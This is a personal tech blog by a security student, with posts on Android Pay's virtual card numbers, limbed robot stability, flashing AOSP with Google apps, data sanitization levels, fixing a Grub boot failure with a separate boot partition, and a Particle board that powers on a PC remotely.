Carter Yagemann '15 is a master's student studying computer science in Syracuse University's College of Engineering and Computer Science. A research assistant in Professor Kevin Du's Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University's School of Information Studies (iSchool).

Initial Observations Regarding Android Pay

2015-10-30T22:30:00-04:00

Android Pay has just come out on the Google Play Store and it's an interesting concept in many ways. I can't help but be curious about its internal workings and after some discussion with a co-worker, I've decided to quickly write up our initial thoughts on the application.

Scope

These are some initial thoughts I had from a security perspective after using Android Pay for the first time. These observations are purely speculative and black box, so they should not be mistaken for fact. These speculations are being made before having done any decompilation or reverse engineering. I will try my best throughout this document to clearly state the observations driving each speculation I make.

Transparency

The first thing that stuck out to me is that Android Pay does not appear to be transparent to the banks. When I added my debit card to the application, for example, I was presented with an EULA from my particular bank. After that, I had to verify my card by signing into my bank's application. In the case of my co-worker, he didn't have to verify his card, but he did receive an email from his bank within minutes containing information regarding Android Pay. In other words, while I may not know exactly how the Android Pay system works, I speculate that it does necessitate the banks being aware of Android Pay. You'll see why this is important in the next speculation.

Virtual Account Number

The other thing that immediately stuck out to me is that upon adding a card to Android Pay, that card is given a "virtual account number." The in-app description of this number reads, "This number is used instead of your actual card number so that your info isn't shared with stores."

Interesting.

While privacy may indeed be part of the motivation behind using a virtual number instead of the real card number, I don't believe this to be the full story. Having worked in a bank for a short while, I know that one of the biggest concerns a bank has is liability and therefore risk management. As we speculated earlier, Android Pay isn't transparent to the banks. This means that the banks have a choice in participating which, in turn, means that they aren't going to participate unless the risks associated with Android Pay are minimal. I speculate this to be the true reason for the virtual number. By using this number in place of the real card's number, should a vulnerability in Android Pay be exploited, damage is limited to exposure of the virtual number and not the real number. Google can reissue this virtual number while the banks are protected from having to reissue a new card. Granted, a fraudulent transaction or two may occur in the time it takes for the virtual number to be deactivated and reissued, but the majority of the burden falls on Google and not the bank. It's even possible that the banks might have an agreement with Google where Google is responsible for repaying the banks for fradulent charges occuring due to Android Pay.

This idea of risk mitigation will come up again in a later speculation I make.

Transaction Processing

The ultimate question my speculations aim to shed light on is how does Android Pay work? What happens when a user makes a purchase using Android Pay? Given the previous two speculations, we can make some educated guesses. I must stress again that this is still speculation, but food for thought none the less.

Before I reveal my next speculation, a bit of background is necessary. Something which you must understand is that in card processing, time is greatly of the essence. A transaction must be processed in a matter of seconds in order for the customer to be satisfied. In these few seconds, the transaction has to pass through multiple parties. In the case of the traditional card, there's the point-of-sales terminal which swipes the card, some back-end system for managing these terminals, the credit card processor (such as Visa), and the bank (such as JPMorgan Chase). The transaction has to pass through all these parties in order to be allowed.

With that understood, I tease my next speculation with a question: Who translates the virtual number into the real number? Surely this translation must happen somewhere, otherwise why would the Android Pay user provide a credit or debit card number in the first place? I speculate that it isn't Google.

Think about it. If Google was translating the virtual number into the real number at the time of use, the process would become transparent to the banks. There would be no reason for Google to solicit partnership with them. But we know Android Pay isn't transparent to the banks, which is strong reason to speculate that this is not the case. Google likely shares the virtual number with the bank at some point during the process of adding or verifying the card.

Handling the virtual number in this manner benefits both parties. First, this decreases the bank's risk because if the translation isn't handled by Google, then Google won't have to send the real number over the wire to the next party in the processing chain. This benefits Google as well because no translating on their end means no need to build out any infrastructure. They can piggyback off the existing card processing infrastructure.

Unanswered Questions

So who does the translation? If it isn't the retailer and it isn't Google, that leaves the bank and the card processor. Sadly, I don't have an answer to this question.

The other question I don't have an answer for is what is actually given to the retailer via NFC at the time of use. Is it simply the virtual number or is it something else?

These question I leave to the reverse-engineers.

How Number of Limbs Relates to Robots and Organisms

2015-10-30T22:30:00-04:00

This weekend was the weekend over which DARPA hosted its large robotics challenge where semi-autonomous robots had to perform a series of tasks simulating a disaster relief scenario. Specifically, robots had to be able to open doors, shut off water valves, drill holes in walls, climb stairs and more. It was quite the spectacle to watch and while it was impressive to see how far robotics has come, it also served as a reminder of how far robotics still has yet to go. The robots were very slow at performing their tasks and there was plenty of falling over and unintended failures. Half the robots I observed couldn't even complete the first task of opening a normal door. In short, we can all rest easy knowing that these robots aren't going to be stealing our jobs or planning a violent uprising any time soon.

One other thing which the average observer may have noticed is that the four legged robots performed significantly better than the two legged humanoid robots. To many the reasons why may seem obvious, but to others this outcome may not be so obvious. Even to those who easily made sense of this outcome, they probably have not realized how these results are consistent with the biological organisms which inhabit our planet. With that in mind, I'd like to take a moment to write about locomotion and how it relates to both robots and biological organisms alike.

Locomotion in Biology

Take a moment to recall every organism you can which moves over land using limbs. Now think about how many limbs each of these organisms have which are primarily used for moving. Now think about the number of limbs again, but this time pay special attention to the size of the organism relative to its number of limbs. Do this long enough, and a pattern should start to emerge. Specifically, smaller organisms like bugs tend to have six or more limbs while larger organisms like mammals have four and humans have only two. Once again, we're only considering the limbs used primarily for moving.

Is there something special about two limbs verses four limbs verses six limbs with regards to locomotion? As it turns out, there is. Specifically, the ability for the organism to remain stable while moving or while stationary changes as its number of limbs change.

Physics of Stability

But first, a bit of physics review. What does it mean for an organism which is standing on limbs to be stable or unstable? First, consider the limbs which are in contact with the ground. Now connect these limbs with imaginary lines to form an imaginary polygon on the ground beneath the organism. In order for an organism to be stable, its center of gravity must be somewhere within this polygon. If the center of gravity leaves this area, the organism will start to tip over and without corrective action, it will eventually topple over. So how does this relate back to having two, four, or six limbs?

Six Limbed Organisms

First, consider the six limbed bug. When the bug is stationary, it is standing on all six limbs and stable. How about when it wants to move? To move, the bug can pick up, for example, it's front right, back right, and middle left limbs. This leaves its front left, back left, and middle right limbs on still on the ground, forming a tripod. As long as the bug keeps its center of gravity near the center of its body, this is a stable position. This means the bug is now free to move its lifted limbs forward and place them down. Placing them down creates another tripod which, in turn, stabilizes the bug so it can lift up and move the limbs which were previously grounded. By using this "alternating tripod" locomotion, the bug can move while always being stable. In other words, if I had a magic wand which could freeze the bug, I could freeze the bug at any point during its locomotion and it would not fall over. So to summarize, with six limbs an organism can be stable while stationary or while in motion.

Four Limbed Organisms

How about the four limbed organism? When its stationary it has four limbs on the ground so again no problem with stability. But what about when it moves? Now there's a problem. With only four limbs, it cannot use the alternating tripod motion described earlier. It can still remain stable while in motion, but the motion would have to be very awkward. Specifically, the organism would have to shift its center of gravity to be within the right triangle formed by three of its limbs, move the now freed limb forward, and then shift its center of gravity over to the newly formed right triangle to free up another limb. This is possible, but now the organism is intentionally shifting its center of gravity as it moves which is something the six limbed organism didn't have to concern itself with. So to summarize, the four limbed organism is stable while stationary and potentially stable while moving, but requires a more complicated locomotion.

Two Limbed Organisms

Which leaves us with the two limbed organism. This organism isn't very stable while standing or moving. The problem is that two limbs only forms a line, not a polygon. So if each limb contacts the ground as only a single point, the organism will constantly be in a state of falling no matter where it shifts its center of gravity. To compensate for this, two limbed organisms have feet. Since the feet contact the ground at multiple points and not just one, the line now becomes a very narrow rectangle and stability can be achieved while standing. However, this rectangle is very narrow compared to the rectangles formed by the stationary four or six limbed organism. Consequently, if someone were to push each organism, the two limbed organism is much easier to knock over than the others. To state it more scientifically, while the four and six limbed organisms are in stable equilibrium when stationary, the two limbed organism is in unstable equilibrium. When disturbed by an outside force, the four and six limbed organisms tend to remain standing while the two limbed organism tends to start falling over.

Similarly to the four limbed organism, while it is possible for the two limbed organism to move without sacrificing stability, doing so results in a very awkward locomotion. The two limbed organism has to shift its center of gravity to be balanced on one foot so it can lift and move the other foot, and then its center of gravity has to be carefully shifted towards the newly placed foot, making sure that the center of gravity doesn't shift outside the narrow rectangle representing its stability. You can imagine how awkward and difficulty this would be.

Complexity Verses Efficiency

So if having less than six limbs makes it difficult for an organism in motion to remain stable, why do any organisms have less than six limbs? As it turns out, being unstable isn't always a bad thing. If an organism is always stable, it has to do all its own work in order to move itself. On the other hand, if an organism is unstable, it can take advantage of gravity to do some of the work of moving for it.

Consider once again the two limbed organism. Specifically, consider a human since that's the two limbed organism we're all most familiar with. Again, I'm only considering limbs used for locomotion. Our primary form of locomotion is called walking, but if you think about it, walking is really nothing more than controlled falling. To walk forward, a person lifts their foot, shifts their center of gravity forward, and then catches themselves with their lifted foot as they fall. The forward momentum from that fall then allows the person to lift their other foot and catch themselves as they fall forward again. After the first step, a portion of the forward energy is being generated by momentum as a result of gravity and this is a portion of energy which no longer needs to be generated by the organism. The result is a much more efficient locomotion than if the organism had to generate all the energy itself.

The same notion applies to running for two and four limbed organisms. Once the organism is running, the energy needed to continue running is simply the energy needed to lift itself a few inches off the ground and then to catch itself when gravity pulls it back down. While the organism is in the part of its stride where all of its limbs are off the ground, it is using no energy while still moving forward. To summarize, instability allows for greater efficiency.

Conclusion

The takeaway from all this is that when it comes to locomotion, the number of limbs a system has results in a trade off between complexity and efficiency. With more limbs, the system can be simpler because its more stable. On the other hand, with less limbs the system can be more efficient, but it also becomes more complex as it has to now be aware of its momentum and center of gravity. This could be an explanation as to why simpler organisms like bugs tend to have many limbs while more complex organisms like mammals tend to have fewer.

So what does all this have to do with the DARPA robotics challenge? What I hope I demonstrated with this rant on locomotion is that it shouldn't come as a surprise that the four limbed robots out performed the two limbed robots in this competition. For the engineers designing and building these robots, making a robot which is able to move on only two limbs adds a layer of complexity which the four limb robots don't have to worry about. However, as the field of robotics advances, two limbed robots will ultimately be superior to four limbed robots on land, especially as efficiency becomes the leading concern.

Installing Google Play Service and Google Apps on Nexus AOSP

2015-10-30T22:30:00-04:00

I figured out how to get Google Play Service and all the basic Google apps onto a custom compiled AOSP image. It's kind of tricky, so I'll outline what I learned here. I specifically got it working on a Nexus 5 device using a modified version of Android 5.0.2, but these steps should hopefully work for all Nexus devices and most Android version. This tutorial is broken up into 4 parts:

Part 1: Compiling a Custom Image

First, make sure you've downloaded the vendor drivers for your device: link

Once you've downloaded the appropriate files, unzip them. You should now have a bunch of script files. Place these script files in the root directory of your AOSP repository and run them.

Next, make sure you've loaded your sources and you're in the correct lunch for your device (for Nexus 5, this is hammerhead aka 20):

source build/envsetup.sh
lunch 20

If this is your first time doing a make with the vendor drivers, you need to clobber to make sure the drivers are compiled into the ROM:

make clobber

After that, make your ROM:

make

Part 2: Flashing Custom Image to a Nexus Device

First, reboot your device into fastboot. The hardware button sequence for your device can be found here: link

Once in fastboot, ensure that your bootloader is unlocked. You can lookup how to do this online.

After that, check that your computer can detect your device. You should see it when you run the following command:

fastboot devices

If you can't see it, check your USB drivers and make sure you have Google's Nexus USB drivers if you're using a Nexus device.

Finally, flash the device:

fastboot -w flashall

Part 3: Flashing Recovery

At this point, you've compiled a custom image and flashed it to your device. The next goal is to install the standard Google apps (GPS, Google Play, Gmail, etc.). Unfortunately, the default recovery doesn't work well with rooted devices. So before we can do that, we need to install a 3rd-party recovery.

First, reboot the device into fastboot. This can be done via adb:

adb reboot bootloader

Once in fastboot, we can flash the recovery partition with our custom recovery. I recommend twrp which can be found here: link

For Nexus 5, this version of twrp will work: link

fastboot flash recovery twrp-2.8.7.1-hammerhead.img

After that, reboot the device:

fastboot reboot

Part 4: Install Gapps

First, push a gapps archive onto your sd card. This can be downloaded from cyanogen's website: link

The website only shows which gapps corresponds to which cyanogenmod version and not the equivalent AOSP version. From my experiences, I believe this much to be true:

Android 5.1.0 <=> CM 12.1
Android 5.0.0, 5.0.1, 5.0.2 <=> CM 12

If you are using a different version of AOSP, you'll have to experiment and find the right version on your own. Note, you can always do a factory reset from recovery to remove gapps and then install another version.

Once you've downloaded a version of gapps, push it to the sd card:

adb push gapps.zip /sdcard/

Once the zip is written to the sd card, reboot into recovery:

adb reboot recovery

Once in the Recovery, select install from zip and select your zip. After the installation is complete, select the wipe button at the bottom of the screen and then reboot the device. If everything worked correctly, you should be prompted with the Welcome screen which will ask you to configure your device. If you do not get the Welcome screen, then you either didn't install the correct version of gapps or you forgot to wipe something.

Digital Verses Analog Sanitization

2015-10-28T22:30:00-04:00

As I promised in my previous blog post, I will try to explain the difference between digital and analog sanitization using an analogy better suited for the task. If you have no clue what I'm talking about, I recommend that you go and read that post. If you were hoping for the other follow-up I promised regarding a more practical guide to data protection, this is not that post. This is going to be another conceptual writing.

The Analogy

The analogy which I'm going to use to try to illustrate the difference between digital and analog sanitization might seem somewhat contrived, but it's the simplest one I could come up with so here it goes.

Imagine you have a collection of buckets which can each hold 4 cups of water. You are able to add and remove water from the buckets whenever you like, however, you must always try to add or remove 3 cups worth of water at a time. So if a bucket is empty and you add water to it, the bucket ends up with 3 cups worth of water in it. If you try to add water again to the same bucket, some water overflows and is lost so ultimately the bucket ends up with 4 cups worth of water in it. Similarly, if the bucket only has 1 cup of water in it and you try to remove water, you end up removing all the remaining water in the bucket.

Now here's the last piece regarding how this analogy works. Assume that we only care about answering the question of if a particular bucket is more full or more empty. Therefore, if the bucket contains more than 2 cups of water, we will call it mostly full. Likewise, if it has less than 2 cups of water, we will consider it mostly empty. We don't have to worry about any bucket having exactly 2 cups of water in it given how this model is works. In fact, it is only possible for any particular bucket to contain 0, 1, 3, or 4 cups of water; assuming all the buckets start empty.

Emptying the Buckets

So we have our buckets and some time has gone by and now all of our buckets contain different amounts of water. Some are mostly full while others are mostly empty. Now lets assume that we want to "wipe" all of our buckets. In other words, we want all our buckets to be mostly empty. The process is pretty easy, we can just go to every bucket and remove water from it. Simple, right?

While it is true that doing this will now cause all of our buckets to be mostly empty, take another look at how much water is actually in each bucket. The buckets which originally had 3 or less cups of water will now be empty, but the buckets which originally had 4 cups of water will still have 1 cup of water remaining. This means that if we inspect how much water is in each bucket, we can determine which ones previously held 4 cups of water. We can reconstruct a portion of the past state of the buckets from the current state of the buckets!

What Went Wrong?

In a nutshell, the reason why we were able to figure out the past state of some of the buckets is because there is a correlation between the last state the bucket was in and its current state. This correlation occurred because when we emptied the buckets, we only consider the 2 possible digital states for a particular bucket and ignored the 4 possible analog states. If we had considered the analog states, we would have realized that we needed to empty each bucket twice in order to make it impossible to determine any bucket's previous state. This is an analogy of the difference between digital and analog sanitization.

Back to Reality

Although our simple analogy used buckets of water, this concept actually applies to electronic storage devices. For those of us with experience in the logical side of computing, such as any computer scientist who might happen to read this, we have a tendency to abstract away the gritty details about how the underlining hardware of a computer works. While utilizing this layer of abstraction simplifies our problems and makes them approachable, abstractions such as these can cause us to forget that our idealistic binary zeros and ones are actually being stored in physical materials. As every electrical engineer knows, these physical materials don't behave in accordance to our perfectly abstracted models. Instead, we have to take their infinite possible analog states and group them into the "zero" set and the "one" set in order to fit them to our models. Never forget, however, that at the end of the day the storage device is indeed physical and consequently analog. Correlations between states can exist, but become hidden underneath the veil of our abstractions.

So to end on a slightly more piratical note, how do professionals deal with these analog correlations? What is the takeaway from all this? The short answer is that if you want to wipe an electronic storage device, but you can't simply destroy it, don't settle with "zeroing" out the data over 1 pass. Overwrite all the data with random values and do so multiple times. The more passes and the more entropy, the less likely it is that a correlation will remain between the original data and the current state of the device. How many passes is necessary depends on the particulars of the device, so if you need to wipe a computer, smart-phone, or other electronic device, I recommend doing some research and selecting a professional tool to do the work for you. DBAN, for example, is a good one to consider.

Is your data really gone? Explaining the challenges of data wiping.

2015-10-24T22:30:00-04:00

Every now and again you hear on the news about some police investigation having a breakthrough by recovering deleted data off of an electronic device belonging to the possible suspect. You may also hear about professional criminals who recover sensitive information, such as credit card numbers, by sifting through the hard drives of old discarded computers.

How does this happen? How is it that data turns out to still be on the device even when the user consciously takes actions to delete it?

In this article, I'm going to be covering a conceptual topic which forms one of the corner stones of a field known as digital forensics. Namely, what does it mean for data on an electronic device to be deleted and what does it take to restore this supposedly destroyed information?

Terminology

The first step to grasping what it means for data to be deleted is to understand that "deletion" can have multiple technical meanings which vary from the definition we use in everyday speech. Basically, there are different extents to which data can be deleted on an electronic device and based on what extent to which we delete the data, recovering it will entail a varying level of difficulty.

Many publications already categorize the degrees of data sanitization. For example, NIST 800-88 (see Table 5.1) offers very generalized definitions of what the degrees of data sanitization are. However, since I want this article to be approachable to the laymen, I'm going to use an alternative categorization used in many publications. If you're curious about how these two categorizations relate, the categorization I'm going to be using in this article fits into the Clear and Purge categories of NIST 800-88. Namely, I'm going to cover logical sanitization, cryptographical sanitization, digital sanitization, and analog sanitization.

Logical Sanitization

Logical sanitization is the weakest form of sanitization and the easiest to explain, so I'll cover it first using an analogy:

Imagine a particular file on your electronic device as being a house. In order to visit the house, you have to know how to get there. Luckily, the streets have signs at every intersection. By following the signs, you're able to find the house.

Now imagine that I take down all the signs. The house still exists, but now if you want to visit it, you'll have to search every street. This is what it means to logically sanitize data.

You can probably already see the shortcoming of this form of sanitization. Just because I take down the signs pointing to a piece of data doesn't mean that someone can't still find that data with enough effort.

Despite this fault, this is what actually happens in your electronic device when you normally delete your file. Your device doesn't actually delete the file itself, it just deletes its pointers to that file. This means that until a new file is written into the space the old file occupied, the old file can still be recovered. And since storage these days is large and most systems write new data randomly across the storage, that old file can remain there for a very long time.

So why do electronic devices delete data this way? Frankly, because it's the fastest method. Most users are more concern about speed rather than security, so system developers design their systems to delete data in the fastest way possible.

Cryptographical Sanitization

Cryptographical sanitization is an alternative version of logical sanitization which offers a bit more protection against data recovery.

To explain the difference, consider the house analogy again, only this time, the house also has a gated wall surrounding it. Luckily, you have a piece of paper in your hand which contains the password to open the gate. Thanks to this paper, you're able to visit the house without problem.

Now if I want to prevent you from visiting the house, I don't need to take down all the street signs, I just need to destroy your piece of paper which contains the password to the gate. Destroying this piece of paper is analogous to cryptographical sanitization.

However, this too has its shortcomings. For example, what if you memorized the password or otherwise made a copy of the paper? Alternatively, what if the password is so short that you could simply guess it? These are two serious challenges for cryptographical sanitization.

Additionally, cryptographical sanitization is weakened by the fact that it is circular. For example, what if I destroyed the paper containing the password by logically sanitizing it? You could just recover the paper, as mentioned in the previous section, and then access the house. In other words, cryptographical sanitization is only as strong as the sanitization applied to the password. If we apply cryptographical sanitization to that as well, then as the philosophers would say, it's turtles all the way down.

Digital Sanitization

Now we reach the stronger techniques for sanitizing data. Both of the two remaining techniques resort to destroying the house, but differentiating between the two can be difficult for the non-technical reader. For this reason, I'm going to keep my explanation brief and stick to the house analogy I've been using up to this point, even though doing so will introduce some vagueness. If you're interested in really understanding the difference between digital and analog sanitization, I plan to write a later article dedicated to this distinction using a different analogy better suited to the task.

Continuing along with the house analogy, digital sanitization is comparable to me taking a bulldozer, leveling the house, and then throwing the pieces into a dumpster and taking that dumpster with me. Now you cannot visit the house because the house simply doesn't exist.

Or can you?

As it turns out, there is still information about the house left behind! For example, you might study the depression in the ground left behind after the house was removed. Based on its size and depth, you might be able to approximate the house's dimensions; even though the house no longer exists. In fact, and this is where the house analogy breaks down, if you know enough about the construction of houses similar to the one that was destroyed, it is actually possible to reconstruct a perfect copy of the original house!

Analog Sanitization

Finally, at least in the scope of this article, we get to analog sanitization. As you've probably anticipated by now, this is the strongest of the four sanitization techniques covered in this article. Using the house analogy, this would be comparable to me not only destroying the house, but then also digging up the dirt on the property and replacing it with new dirt and leveling it. Now there are no remaining indicators that a house ever existed at any time in that spot, so there is nothing left to be used to try to reconstruct a replica house from. The data is truly gone at this point, so long as I have indeed destroyed every trace of the original house and its impact it had on its environment. That's a pretty big conditional claim I just made, but I'll leave it at that.

Afterword

This article ended up becoming more conceptual than I originally intended, but I hope the analogy was able to make the concepts I covered approachable. As mentioned, I hope to at some point write a follow-up article using another analogy which can better explain the difference between digital and analog sanitization. I also hope to in the future write an article to serve as the practical counterpart to this article for those who would like to know more about how to securely delete the data from their electronic devices.

The importance of boot partitions in Linux systems.

2015-10-20T22:30:00-04:00

Over the weekend, the lab I work in experienced a power outage. After power was restored, one of our servers failed to boot. It ultimately became my responsibility to figure out if the server could be repaired and failure wasn't an option because the server was configured (with no backups) to run a bunch of services and hosted lots of data (with no backups) for many users. Typical sysop problem (lol), but our lab has no personnel for managing the systems; so there I was.

In the process of finding and fixing the issue, I learned a lot of specifics regarding how the Grub bootloader and Linux work during system boot, so I decided to document my experience for future reference by others. This documentation will be lengthy, so if you only care about avoiding this type of problem, skip ahead to the Remediation section.

Finding the Problem

The server in question was a Dell Poweredge T620 running Ubuntu. The server consisted of two Intel Xeon processors, about 128GB of RAM, and three 2TB hard drives connected to a RAID controller.

The problem occurred during system start-up. The BIOS would start Grub, and then Grub would produce the error error: attempt to read or write outside of disk hd0. After that, the Linux kernel would start, but shortly after would spit out a stack trace and crash.

My first response was to run a disk check on the hard drives to make sure there weren't any problems with their sectors, but this turned up nothing. The disks were operating normally. This meant that the problem was most likely related to Grub.

Diagnosing the Problem

Since the error message that was appearing was being generated by Grub, the next thing I did was try to manually start the Linux kernel. The easiest way to do this is to press 'c' when the Grub menu appears. This will start a Grub command shell through which operating systems can be manually booted.

Understanding Partitions

Before explaining the commands I used while in the Grub command shell, I'll summarize some basics regarding partitions here.

First, hard drives and their partitions can be accessed in Linux via the "/dev" directory. In most modern Linux systems, hard drives follow a naming convention which starts with "sd" followed by a letter designating the drive. "sda", "sdb", "sdc", etc. Partition names are prefixed with a hard drive name followed by a digit designation. The hard drive "sda", for example, might have the partitions "sda1", "sda2", and so forth in the "/dev" directory.

Grub also uses the notion of disks and partitions, but the naming syntax is a little different. The syntax takes the form of "hd#,#" where the first # represents the disk number and the second # represents the partition on that disk. So "hd0,1", "hd0,2", and so on.

Boot Sequence

While I'm covering general Linux background knowledge, I'll also mention a portion of the boot sequence for Linux because this will also be important for understanding the Grub commands. In most Linux systems which boot using the BIOS (as opposed to newer EFI or UEFI booting) the critical pieces are: BIOS, Grub, initrd, and vmlinux.

BIOS stands for Basic Input Output System and is the first thing the system executes upon receiving power. Once the BIOS is started, it'll perform some basic system checks and then load and execute the bootloader. There are many bootloaders out there, but Linux systems tend to use a particular one called Grub. Grub's job is to load the pieces into memory that are necessary to start the operating system. In the case of Linux, the two important pieces which Grub needs to write into memory are initrd and vmlinux. I won't discuss these files in great detail, but to explain them briefly, initrd is the initial RAM disk for the Linux operating system. What that means is that initrd contains a minimalistic copy of Linux comprising of only the kernel and essential programs. Grub will load it into memory and then execute it and it will start up the full Linux kernel contained in the vmlinux file. Once the full Linux kernel is booted, initrd will unload itself from memory.

Diagnosing Grub

Now that I've covered all the necessary background information, on to the Grub commands.

The first step is to find where the boot directory is on the system. First, list all the partitions on the system:

grub> ls

This will create a list of all the partitions on the system. The next step is to figure out which one contains Grub, initrd, and vmlinux (since we're trying to boot a Linux operating system). This can also be done with the list command:

grub> ls (hd0,1)
grub> ls (hd0,1)/boot

Once we've found the location of the boot files, set that partition as Grub's root directory:

grub> set root=(hd0,1)

I used "hd0,1" in the above commands, but you might find the boot files in a different partition. Either way, the boot files for a Linux system should always be either in the root directory of the partition (if that partition is a standalone boot partition) or in "/boot" (if that partition also holds other files).

After we've found the correct root partition, we next need to give Grub the names of the vmlinux and initrd files:

grub> /boot/vmlinux root=/dev/sda1
grub> initrd /boot/initrd

Note, the vmlinux command needs to be passed the parameter "root". This parameter should be the partition which holds the Linux operating system. This may or may not be the same partition holding the boot files.

Once all the files have been specified, all that's left is to boot the operating system:

grub> boot

At this point, you'll get a basic command shell for Linux. Of course, our lab's server was failing to boot, so this didn't happen. Instead, the error mentioned at the beginning appeared when I tried to execute the initrd command. Because of this, I now know that initrd is the problematic file. So how do we fix this?

Remediation

So what went wrong? Basically, the problem is with the partitions on the server's hard drives. For some reason, when Grub tries to load the initrd file into memory, it reaches the end of what it can read from the hard drive before reaching the end of the file. In our case, the problem is that our RAID controller makes the hard drives appear as a single 4TB drive. This is quite large and the initrd file could reside anywhere in those 4TBs. As it turns out, Grub could not address the memory location of our initrd file and therefore couldn't load it. So the power outage was not the direct cause of our problem. At some point, most likely during an Ubuntu update, the initrd file was modified and ended up in a location on the logical hard drive which Grub can't reach.

The solution to this problem is to keep the boot files to a small partition which resides at the start of the hard drive. For those readers who skipped straight to this section, that's all you need to know. When you install a Linux system, you really should make a dedicated 256MB partition for holding the boot files, despite the fact that most Linux installers do not require you to do this.

In my case, however, I couldn't just reinstall the operating system, so in the following paragraphs I'll describe how I migrated the boot files in my already existing Linux installation into a new dedicated boot partition.

Creating a Boot Partition in an Existing Linux Installation

I started by flashing a copy of Ubuntu to a flash drive and booting it. There are plenty of tutorials on the internet about how to boot Ubuntu from a flash drive, so I'll forgo those instructions here.

The first thing I did was use gparted to create a new partition which will serve as our dedicated boot partition. Since the hard drive is already formatted, doing this requires shrinking the main partition and shifting it 256MB over. This frees up space at the start of the hard drive which can then be formatted into the new dedicated boot partition. If you've never used gparted before, I recommend using the GUI version since it's pretty intuitive. The new partition can be formatted to "ext4" and needs to have the "boot" flag enabled. Completing the shift will take awhile, so you'll probably want to do this overnight.

Once the new partition has been created, we next need to copy the existing "/boot" directory's contents over to the new partition. This can be done by mounting the two partitions while still in the Ubuntu Live USB. In the following commands, sda2 is my main partition and sda4 is the new boot partition:

sudo -s
mkdir /mnt/sda2
mkdir /mnt/sda4
mount /dev/sda2 /mnt/sda2
mount /dev/sda4 /mnt/sda4
cp -R /mnt/sda2/boot/* /mnt/sda4/
rm -rf /mnt/sda2/boot/
mkdir /mnt/sda2/boot
umount /mnt/sda2
umount /mnt/sda4

Finally, Linux and Grub need to be reconfigured so they know that the "/boot" directory is now in a separate partition. This can be done manually by modifying Grub's "grub.cfg" file and Linux's "/etc/fstab" file, but for simplicity, you can use Boot Repair. If you choose to go the Boot Repair route, make sure to switch the GUI into advance mode and go through all the options. Specifically, you need to make sure the "boot partition" option is set to your new boot partition and the "main operating system"" option is set to your main partition. Also, make sure the "set boot flag" option is pointed at your new boot partition and you can save a lot of time by disabling the "check filesystem for errors" option. If you instead decide to go the manual route, you'll need to manually edit "grub.cfg" looking for every "hd" reference and changing it to point at the correct partitions and the fstab file will need an additional entry to mount your new partition at start-up to the "/boot" directory.

If you do everything correctly, this should fix your Linux system and prevent similar issues from arising in the future.

Conclusion

Even though modern Linux installers do not require you to create a separate partition for the boot files, I recommend doing it anyway, especially if you have large hard drives. Otherwise, you might run into the problem I did.

Using internet of things to turn on a computer.

2015-09-18T11:16:00-04:00

Here's a fun and quick but practical hack using a small Particle board to turn on and off a computer from anywhere over the internet.

This project takes under an hour and is a good little assignment for anyone looking into learning some basic hardware hacking with useful applications.

The Scenario

I have a computer in my apartment which I mostly use for playing video games, but sometimes I like to access it remotely over the internet to do server tasks for me. The problem though is that gaming desktops use a lot of electricity when they're running. So running the computer 24/7 would be too wasteful.

Instead, I want to be able to turn on my computer from anywhere on the internet; whenever I desire to use it remotely.

This can be achieved using "wake-on-LAN" (WoL), but unfortunately my desktop's motherboard is too old to support this. So instead, I decided to connect a Particle Core to my desktop's motherboard so it can turn on the computer for me!

Particle

For this hack, I used a Particle Core because that's what I had laying around, but a Photon would work just as well and is only $19. For the sake of brevity, I'm going to skip the details of how to setup and configure your Particle device. If this is your first time using Particle, they have a tutorial here.

ATX Motherboards

My motherboard is an ATX, but the process should be similar for other common motherboard specifications.

So how does pushing the power button turn on your computer? Your motherboard has two pins on it which are used to turn on the computer:

One of the two pins (labled Power Switch in the above diagram) holds a 3.3V to 5V charge and the other pin is ground. When you press the power button, the circuit is completed, allowing the charged pin to discharge into the ground pin. This drop in voltage is detected by the motherboard which serves as the signal that it's time to power up.

For our project, we're going to do the same thing, only instead of using a button, we're going to use a Particle.

Wiring the Particle

The circuit is pretty simple and with the right supplies you won't even need to solder anything! Once you've identified which pins on your motherboard are for the power, you can use the simple diagram below to wire everything up. All we're going to do is run a wire from one of the digital pins on the Particle to one of the power pins and then another wire from the Particle's ground to the other pin. I also added a small 220 ohm resistor to the ground wire just to make sure the Particle doesn't get fried.

Software

One of the nice things about Particle's boards is that they all communicate with Particle's cloud. This allows us to write our code through Particle's web interface and then the cloud can remotely flash the Particle. No need to open the case!

The following is the source code for our Particle:

/**
 * Mobo Power - Copyright 2015 Carter Yagemann
 * 
 * This program allows a core to power on a motherboard over the internet!
 * 
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 */

void setup() {
    // D0 will control the motherboard
    pinMode(D0, OUTPUT);

    // ATX boards maintain high power on their power pin and then ground
    // shortly to signal that the motherboard should power up. So we
    // normally want the pin to be in the high state.
    digitalWrite(D0, HIGH);

    // Register a function with Particle's cloud service so we can invoke
    // the core from over the internet.
    Spark.function("poweron", powerOn);
}

void loop() {
    // Nothing to do
}

int powerOn(String command) {
    // Switch the pin to low for half a second so the motherboard knows
    // it's time to turn on.
    digitalWrite(D0, LOW);
    delay(500);
    digitalWrite(D0, HIGH);

    return 1;
}

Once we've flashed our Particle with this software, all that's left is to use it!

Pressing the button... from anywhere in the world

You can communicate with your Particle through their REST API. The simplest way to do this is with a curl command:

curl https://api.particle.io/v1/devices/device_id/powerOn -d access_token=access_token

Where device_id is the ID for your Particle and the access_token is your account token.

And that's it! Hopefully you've found this tutorial to be useful. If you have any questions or comments, you can contact me via any of the means listed on my homepage.

Happy hacking!

Installing psad on Raspberry Pi Running Arch Linux

2015-02-13T11:00:00-05:00

I've been fooling around with IDS and specifically psad and I thought it would be fun to try installing psad on my raspberry pi. Little did I know, installing psad on an ARM processor running Arch Linux with systemd is not a simple process. It took me great effort to get psad running correctly, so I thought I'd take the time to document my struggles in the hopes that this will be useful to someone else.

What is psad?

psad is an intrusion detection system (IDS) which works by monitoring logs generated by iptables (a network firewall common to most Linux distros). You can find more information on psad here.

Scope of this document

The focus of this document is on challenges I ran into while trying to get psad to install and run on a raspberry pi and my solutions. This document does not cover how to configure or use psad. It does cover things which I had to taken into consideration due to the raspberry pi CPU being an ARM processor and due to my OS being Arch Linux with systemd.

Contact
